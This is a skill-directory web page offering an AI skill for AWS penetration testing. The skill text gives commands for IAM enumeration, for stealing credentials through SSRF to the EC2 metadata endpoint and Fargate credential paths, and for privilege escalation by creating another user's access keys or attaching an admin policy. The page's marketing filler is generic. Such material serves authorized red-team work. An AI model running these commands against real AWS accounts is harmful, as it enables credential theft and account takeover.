Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Aws Penetration Testing

Aws Penetration Testing is an code AI skill with a core value of This skill should be used when the user asks to \"pentest AWS\", \"test AWS security\", \"enumerate IAM\", \"exploit cloud infrastructure\", \"AWS privilege escalation\", \"S3 bucket testing. It helps developers solve real-world problems in the code domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"pentest AWS\", \"test AWS security\", \"enumerate IAM\", \"exploit cloud infrastructure\", \"AWS privilege escalation\", \"S3 bucket testing...

Last verified on: 2026-07-07

Quick Facts

Category code
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level High
mkdir -p ./skills/aws-penetration-testing && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/aws-penetration-testing/SKILL.md -o ./skills/aws-penetration-testing/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# AWS Penetration Testing


Purpose


Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.


Inputs/Prerequisites


- AWS CLI configured with credentials

- Valid AWS credentials (even low-privilege)

- Understanding of AWS IAM model

- Python 3, boto3 library

- Tools: Pacu, Prowler, ScoutSuite, SkyArk


Outputs/Deliverables


- IAM privilege escalation paths

- Extracted credentials and secrets

- Compromised EC2/Lambda/S3 resources

- Persistence mechanisms

- Security audit findings


---


Essential Tools


| Tool | Purpose | Installation |

|------|---------|--------------|

| Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |

| SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |

| Prowler | Security auditing | `pip install prowler` |

| ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |

| enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |

| Principal Mapper | IAM analysis | `pip install principalmapper` |


---


Core Workflow


Step 1: Initial Enumeration


Identify the compromised identity and permissions:


bash
# Check current identity
aws sts get-caller-identity

# Configure profile
aws configure --profile compromised

# List access keys
aws iam list-access-keys

# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...

Step 2: IAM Enumeration


bash
# List all users
aws iam list-users

# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER

# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER

# List inline policies
aws iam list-user-policies --user-name TARGET_USER

# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1

# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME

Step 3: Metadata SSRF (EC2)


Exploit SSRF to access metadata endpoint (IMDSv1):


bash
# Access metadata endpoint
http://169.254.169.254/latest/meta-data/

# Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extract temporary credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

# Response contains:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2019-08-01T05:20:30Z"
}

**For IMDSv2 (token required):**


bash
# Get token first
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  "http://169.254.169.254/latest/api/token")

# Use token for requests
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

**Fargate Container Credentials:**


bash
# Read environment for credential path
/proc/self/environ
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...

# Access credentials
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH

---


Privilege Escalation Techniques


Shadow Admin Permissions


These permissions are equivalent to administrator:


| Permission | Exploitation |

|------------|--------------|

| `iam:CreateAccessKey` | Create keys for admin user |

| `iam:CreateLoginProfile` | Set password for any user |

| `iam:AttachUserPolicy` | Attach admin policy to self |

| `iam:PutUserPolicy` | Add inline admin policy |

| `iam:AddUserToGroup` | Add self to admin group |

| `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |

| `lambda:UpdateFunctionCode` | Inject code into Lambda |


Create Access Key for Another User


bash
aws iam create-access-key --user-name target_user

Attach Admin Policy


bash
aws iam attach-user-policy --user-name my_username \
  --policy-arn arn

🎯 Best For

  • Security auditors
  • DevSecOps teams
  • Compliance officers
  • QA engineers
  • Developers writing unit tests

💡 Use Cases

  • Auditing dependencies for known CVEs
  • Scanning API endpoints for auth gaps
  • Generating test cases for edge conditions
  • Writing integration test suites

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Aws Penetration Testing to Your Work

    Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.

  4. 4

    Review and Refine

    Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.

❓ Frequently Asked Questions

Can this replace a dedicated SAST tool?

AI-based security review is complementary to SAST tools. Use it as a first-pass filter, not a replacement.

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

Is Aws Penetration Testing compatible with Cursor and VS Code?

Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.

Do I need specific dependencies for Aws Penetration Testing?

Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.

How do I install Aws Penetration Testing?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/aws-penetration-testing/SKILL.md, ready to use.

⚠️ Common Mistakes to Avoid

Only scanning surface-level issues

Deep security review requires understanding your app architecture, not just regex patterns.

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Skipping validation

Always test AI-generated code changes, even for simple refactors.

Missing dependency updates

Check if the skill requires updated dependencies or new packages.

🔗 Related Skills